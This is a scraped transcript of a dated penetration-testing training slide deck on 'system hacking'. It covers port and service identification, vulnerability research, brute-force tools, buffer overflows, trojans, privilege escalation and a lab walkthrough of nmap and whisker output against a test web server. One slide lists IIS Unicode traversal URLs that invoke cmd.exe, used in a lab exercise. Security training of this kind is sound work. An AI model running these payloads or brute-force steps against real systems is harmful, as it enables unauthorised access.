System Hacking - PowerPoint PPT Presentation

About This Presentation

Title:

System Hacking

Description:

Explore the following security sites to identify what vulnerability information ... Normally blocked at routers due to broadcast. 8/3/09. Profile: Web ... – PowerPoint PPT presentation

Number of Views:1784

Avg rating:3.0/5.0

Slides: 102

Provided by: me690

Category:

more less

Transcript and Presenter's Notes

Title: System Hacking

1
System Hacking

Section 4

2
Outline

Service identification
Vulnerability identification and research
Exploits
Putting it all together
Target selection in large networks
Using automated tools

3
Service Identification

Section 4.1

4
Service Identification

Common ports
Banners
Fingerprinting

5
Connecting to ports

Telnet or netcat is the best way to connect to
ports
Many services may be accessed directly

6
Common ports
Many services can be identified by their common
port numbers
7
Zone-h.org
8
Alldas.de
9
Banners

Some services may be better identified by
banners
telnet on routers (2001, 4001, 6001)
Web daemons for applications
Compaq Insight Manager
Many systems include web configuration interfaces

10
Banners
11
Fingerprinting

Some services cannot be clearly identified just
by connecting the them
Netbus on NT uses the same port as an RPC service
on Solaris
Some database connections do not provide
automatic response
Fingerprinting a service may identify what it is,
even if it has moved ports

12
Fingerprinting
13
Vulnerability Research

Section 4.2

14
Vulnerability identification and research

This is the process of mapping identified
security attributes of a system or application to
potential vulnerabilities
Several methods to map vulnerabilities
Manually map identified systems against publicly
available database such as www.securityfocus.com,
www.cert.org and vendor security alerts
Use public exploit code posted to various
security mailing lists, hacker websites or write
your own code
Use automated vulnerability scanning tools such
as Nessus, ISS or whisker

15
Vulnerability research
16
Lab

Explore the following security sites to identify
what vulnerability information would be of use to
you for the services you have identified.
www.securityfocus.com
General searches on google.com
www.packetstormsecurity.com
www.astalavista.box.sk
www.securiteam.com
Time 30 minutes

17
Exploits

Section 4.3

18
Types of exploits

Remote exploits
Trojans
Privilege escalation

19
Remote Exploits

Section 4.3.1

20
Remote exploits

A remote exploit attempts to gain access across
the network and without proper authentication.
Examples
Brute force authentication attempts
Attacks bypassing integrity checkers
Buffer overflows
Sniffing (to some extent)

21
Brute force attacks

Most common services attacked
Telnet
FTP
R commands
Secure Shell
SNMP community names
Post Office Protocol (POP)
HyperText Transport Protocol (HTTP/HTTPS)
SMB

22
Common Tools used

Brutus
Admsnmp
Admsmb
TeeNet
Pwscan.pl
Thc_hydra

23
Remote password guessing

Attempting to connect to an enumerated share such
as (ADMIN and C) and trying username/password
combinations until one works
A null session can be established with the
target to obtain valid account names
Use an automated password guessing tool to brute
force the selected shares.

24
Brute force attacks under Windows

Some common services prone to brute-force
Web
Netbios
FTP

25
(No Transcript)
26
Legion
27
Brute force attacks under Unix

Some common services prone to brute-force
telnet
Ssh
Web
FTP
R-commands

28
Lab

Use a Netbios scanning tool to identify local
shares on this network
Use brute force tool to attempt access to an
account on 10.0.1.120
Warning! These tools can produce significant
traffic and lock accounts.
Time 30 minutes

29
Buffer overflow attacks

FULL WORKSHOP ON BUFFER OVERFLOWS AVAILABLE from
LOUD-FAT-BLOKE
Stack overflows
Format string overflows
Heap overflows
Overflow subverting the control path

30
Buffer overflow attacks

FULL WORKSHOP ON BUFFER OVERFLOWS AVAILABLE from
LOUD-FAT-BLOKE

31
Buffer overflow attacks

FULL WORKSHOP ON BUFFER OVERFLOWS AVAILABLE from
LOUD-FAT-BLOKE
Occurs when a user or process attempts to place
more data into a buffer than was originally
allocated
Commonly associated with C functions like
strcpy(), strcat(), sprintf() and etc
Most frequently found when user input is taken
and passed into an application

32
Windows buffer overflows

Only a few conditions have been revealed to date
All of them exploited flaws in application
programs
Very common for DoS attacks
Exploits
Netmeeting 2.x by Cult of the Dead Cow
NT RAS by Cerberus Information Security
Winhlp32 by Cerberus Information Security
IISHack by eEye
Oracle Web Listener 4.0 by CIS
Outlook GMT token overrun by Underground Security
Systems Research
IIS .printer

33
Unix buffer overflows

Sadmind
ftp
Ssh
nfs

34
Unexpected input

Bypassing integrity checks
Gaining access by providing unexpected input
IIS unicode
Web applications

35
Format string attacks

Caused by programming errors in the formatted
output family of functions, which includes
printf() and sprintf()
Efforts usually focused on SUID root programs

36
Input validation attacks

Occurs when a program fails to recognise
syntactically incorrect input
Occurs when a module accepts extraneous input
Occurs when a module fails to handle missing
input fields
A field-value correlation error occurs
Common in web applications

37
IIS vulnerabilities

Unicode and URL based attacks
Special tags in HTTP
Sample scripts to brute force

38
IIS hacking

/scripts/root.exe?/cdir
/MSADC/root.exe?/cdir
/c/winnt/system32/cmd.exe?/cdir
/d/winnt/system32/cmd.exe?/cdir
/scripts/..255c../winnt/system32/cmd.exe?/cdir
/_vti_bin/..255c../..255c../..255c../winnt/syst
em32/cmd.exe?/cdir
/_mem_bin/..255c../..255c../..255c../winnt/syst
em32/cmd.exe?/cdir
/msadc/..255c../..255c../..255c/..c11c../..c
11c../..c11c../winnt/system32/cmd.exe?/cdir
/scripts/..c11c../winnt/system32/cmd.exe?/cdir
/scripts/..c02f../winnt/system32/cmd.exe?/cdir
/scripts/..c0af../winnt/system32/cmd.exe?/cdir
/scripts/..c19c../winnt/system32/cmd.exe?/cdir
/scripts/..3563../winnt/system32/cmd.exe?/cdir
/scripts/..35c../winnt/system32/cmd.exe?/cdir
/scripts/..253563../winnt/system32/cmd.exe?/cd
ir
/scripts/..252f../winnt/system32/cmd.exe?/cdir

39
Lab

Use the provided URLs to roam the filesystem of
10.0.1.120
What is accessible and what is not?
Time 10 minutes

40
Trojan Horses and Backdoors

Section 4.3.2

41
Windows trojans and backdoors

These programs provide unauthorised access to a
system without the users knowledge
Theef
CDC BackOrifice
SubSeven
Moosucker
A great site http//www.tlsecurity.net

42
Tlsecurity.net
43
Privilege Escalation

Section 4.3.3

44
Privilege escalation

Attack used to move from normal user to superuser
Quest for Administrator
Quest for root

45
Quest for Administrator

Hoovering information
Getadmin
Sechole
Spoofing LPC Port requests

46
Hoovering information

Identify further information that will gain
higher privileges
Srvinfo
Find utility
regdmp

47
Getadmin

Windows NT 4
Small program written by Konstantin Sobolev
Adds users to the local admin group
Hijacks a process called winlogon
Patched by NT SP3

48
Sechole

Similar functionality to getadmin
Modifies instructions in the memory of the
OpenProcess API
Possible to launch remotely if IIS is running
Patched by NT SP6a

49
Spoofing LPC Port Requests

Vulnerability identified by The RAZOR Team at
http//razor.bindview.com
The code takes advantage of a flaw in one
function of the Local Procedure Call (LPC) Ports
API

50
Quest for root

Local buffer overflow
Symlink
File Descriptor attacks
Signal handling
Core-file manipulation
Shared libraries
Kernel flaws
System misconfiguration
IFS attacks

51
Local buffer overflow

Mostly used to exploit SUID root programs
May add username to password file

52
Sniffing

Section 4.3.4

53
Sniffing

Sniffing works by setting a network card to
promiscuous mode
Sniffing only works on traffic travelling across
the local network
Sniffing is greatly complicated by network switchs

54
Windows password sniffing

Can use any ordinary packet analyser
Or use a specialised tool such as l0phtcrack
Some susceptible services
Netbios
FTP
Web (especially cookies)

55
Windows password sniffing
56
Unix password sniffing

Can use any ordinary packet analyser
But Unix has some great sniffers such as dsniff
Many Unix programs send passwords in clear text
Some susceptible services
Telnet
FTP
Web

57
dsniff

Netbios
ftp
telnet
R-commands
http
Instant messenging
And much much more!

58
NT services

Section 4.4

59
Common NT services
60
Profile Netbios

Ports 135139
Susceptible to sniffing, brute force
Scanners available to search for shares
Can give access to system registry
Normally blocked at routers due to broadcast

61
Profile Web

Port 80, or any for special apps
Common servers Apache, Oracle, IIS, Cold Fusion
Very susceptible to DoS attacks
Often give read access to all files
IIS vulnerabilities are legendary

62
Profile SMTP

Port 25
Very susceptible to mail relay
Not a lot else

63
Profile FTP

Port21
Part of IIS distribution
Some vulnerabilities but not a large target

64
Profile databases

Ports 1433, 1510, 1725
MSSql is a good internal network target
MS and Oracle often set with default passwords
SQL injection a favourite for web hackers

65
Unix services

Section 4.5

66
Profile SNMP

Port 160, 161 UDP
SNMP has two default passwords public, private
Tools such as snmpwalk good for enumerating
entries

67
Profile TFTP

Port 69
Typically used to boot diskless workstations or
network devices such as routers
No username or password
Good for sending around files from hacked systems

68
Profile FTP

Ports 20, 21
Allows upload and download of files from a remote
system
Many ftp server allow anonymous access
May be vulnerable to buffer overflow
Can also be used for bounce attacks

69
Profile Sendmail

Port 25
Mail transfer agent used on many Unix systems
Can be used to identify accounts via the vrfy and
expn commands
Some version susceptible to denial of service and
buffer overflows
Long list of vulnerabilities

70
Profile RPC

Remote Procedure Call
Allow a program on one computer to execute code
on a remote system

71
Profile Web

Port 80
Apache is most common
Not as many attacks as IIS
Always check URLs for embedded commands

72
Identifying targets in large networks

Section 4.6

73
Target selection

Scan for specific services
Database (MS, Oracle, Sybase)
Web
RPC
R-commands
View Netbios browse lists to make way to
PDC/server
View Netbios browse lists to identify treasury,
etc

74
Automated vulnerability scanning tools

Section 4.8

75
Example automated applications

Grinder
SiteScan
Whisker
Twwscan
Nessus
Elza scriptable web client

76
whisker
77
Nessus
78
Conclusion

Hackers often search for specific known
vulnerabilities and avoid well-secured systems
Free tools make it simple to gain unauthorised
access to some systems
Tools such as Nessus should be used by every
security professional

79
Putting it all together

Section 4.7

80
Our Configuration for today
For the purpose of the presentation, we will not
perform our tests over the internet But we wont
cheat by cutting out the firewall
Webserver Internal10.0.1.120 External10.0.0.120
TCP 80 only
Firewall 10.0.0.125 10.0.1.125
Router
81
Network Penetration Tests

82
Identifying firewall Strategy

Identify the Web or Mail server
Get the Next-Hop before this
This will probably be the perimeter router or the
firewall
Firewall 1 NetScreen appear as a hop
PIX does not appear as a hop (flattens the
network)
80 chance that it will be NetScreen, PIX or
Firewall 1
To figure out which
ICMP ( i.e. Address Mask Request Response
headers)
Use TCP Stack finger printing
Key ports (258, 259 263 could be firewall 1)
IPSEC
BUT luckily these days the tools are pre-written

83
Identifying the Firewall - Traceroute
root_at_wireless root traceroute
10.0.0.120 traceroute to 10.0.0.120
(10.0.0.120) 30 hops max, 38 byte packets 1
2
UDP being blocked Need another tool
84
Identifying the Firewall - LFT
lft -vv E -n 10.0.0.120 Looks like we made
it. Everyone responded. Moving on... Will
finish TWO Concluding with 2 hops. TTL LFT
trace to 10.0.0.12080/tcp 4.2 BSD bugnext
gateway may errantly reply with reused TTLs 1
target 10.0.0.12080 6.5ms 4.2 BSD bugnext
gateway may errantly reply with reused TTLs 2
target 10.0.0.12080 1.6ms
Suggests something between us
A firewall perhaps
Could also use MPTraceroute
85
Accessible hosts sweep for the firewall
nmap -sP -n 10.0.0. Starting nmap V. 3.00 (
www.insecure.org/nmap/ ) Host (10.0.0.120)
appears to be up. Host (10.0.0.121) appears to
be down. Host (10.0.0.122) appears to be down.
Host (10.0.0.123) appears to be down. Host
(10.0.0.124) appears to be down. Host
(10.0.0.125) appears to be up. Host
(10.0.0.255) appears to be down. Nmap run
completed -- 256 IP addresses (2 hosts up)
scanned in 35 seconds
Our web server
Whos this
86
Identifying the perimeter Ike-scan
ike-scan -v 10.0.0.125 Starting ike-scan 1.6
with 1 hosts --- Pass 1 of 3 completed --- Pass
2 of 3 completed --- Pass 3 of 3 completed
Ending ike-scan 1.6 1 hosts scanned in 22.595
seconds (0.04 hosts/sec). 0 returned handshake
0 returned notify
87
Identifying the Firewall - conclusion
ping 10.0.0.120 PING 10.0.0.120 56(84)
bytes of data. 64 bytes from 10.0.0.120
icmp_seq1 ttl128 time0.280 ms --- 10.0.0.120
ping statistics --- 2 packets transmitted, 2
received, 0 loss ping -v -R 10.0.0.120
PING 10.0.0.120 56(124) bytes of data. ---
10.0.0.120 ping statistics --- 6 packets
transmitted, 0 received,100 loss
Windows !!
With low level Packet inspection I think not!!
88
Identifying the Firewall Icmp processing
ping -v -T tsandaddr 10.0.0.120 PING 10.0.0.120
(10.0.0.120) from 10.0.0.1 56(124) bytes of
data. --- 10.0.0.120 ping statistics --- 16
packets transmitted, 0 received, 100 loss
ping -v -T tsandaddr 10.0.0.125 PING 10.0.0.125
(10.0.0.125) from 10.0.0.1 56(124) bytes of
data. --- 10.0.0.125 ping statistics --- 8
packets transmitted, 0 received, 100 loss
89
Identifying the Firewall - Conclusion

We suspect there is a firewall
We know the web server is windows
But windows is not normally capable of
manipulating packets to this extent
We are fairly sure that it isnt firewall 1
Lets see if we can hack into the servers

90
Hacking the other address - 10.0.0.125

91
Scanning 10.0.0.125
nmap -sS -n -p 1-10000 10.0.0.125 Starting
nmap 3.48 ( http//www.insecure.org/nmap/ ) All
10000 scanned ports on 10.0.0.125 are
filtered Nmap run completed -- 1 IP address (1
host up) nmap -sU -n -p 1-10000
10.0.0.125 Starting nmap 3.48 (
http//www.insecure.org/nmap/ ) All 10000
scanned ports on 10.0.0.125 are filtered Nmap
run completed -- 1 IP address (1 host up)
Nothing to hack
92
Hacking the web server

93
Hacking the web server

Scan TCP ports
Scan UDP ports
!!! Only HTTP or HTTPS ports should be visible
Run CGI scanner (I.e. Whisker, Crazymad or Nikto)
to look for web server exploits
Check Scanner
Identify exploits

94
Hacking the web server Scan UDP ports

nmap -sU -n -p 1-10000 10.0.0.120
Starting nmap 3.48
All 10000 scanned ports on 10.0.0.120 are
filtered
Nmap run completed -- 1 IP address (1 host up)
scanned in 623.296 seconds

Nothing to hack
95
Hacking the web server Scan TCP ports

nmap -sS -n -O -p 1-1024 10.0.0.120
Interesting ports on 10.0.0.120
(The 1023 ports scanned but are filtered)
PORT STATE SERVICE
80/tcp open http
Running (JUST GUESSING) Cisco pix os 6.X (88)
Aggressive OS guesses Cisco PIX 501 running 6.x
No exact OS matches for host.
Nmap completed -- 1 IP address (1 host up)

HTTP - The only Port to hack
Now we know
96
Hacking the web server Run CGI scanner

./whisker.pl -h 10.0.0.120
-- whisker / v1.4.0 / rain forest puppy
Host 10.0.0.120
Server Microsoft-IIS/4.0
200 OK (IDC error) GET /scripts/samples/details
.idc
200 OK (IDC error) GET /scripts/samples/ctguest
b.idc
200 OK HEAD /scripts/tools/newdsn.exe
this can be used to make DSNs, useful in use with
our ODBC exploit
- and the RDS exploit (with msadcs.dll)
root_at_wireless v1.4 exit

97
Hacking the web server Analysing CGI scanner
results
98
Hacking the web server Analysing CGI scanner
results
99
Hacking the web server Analysing CGI scanner
results
100
Run exploit identified by scanner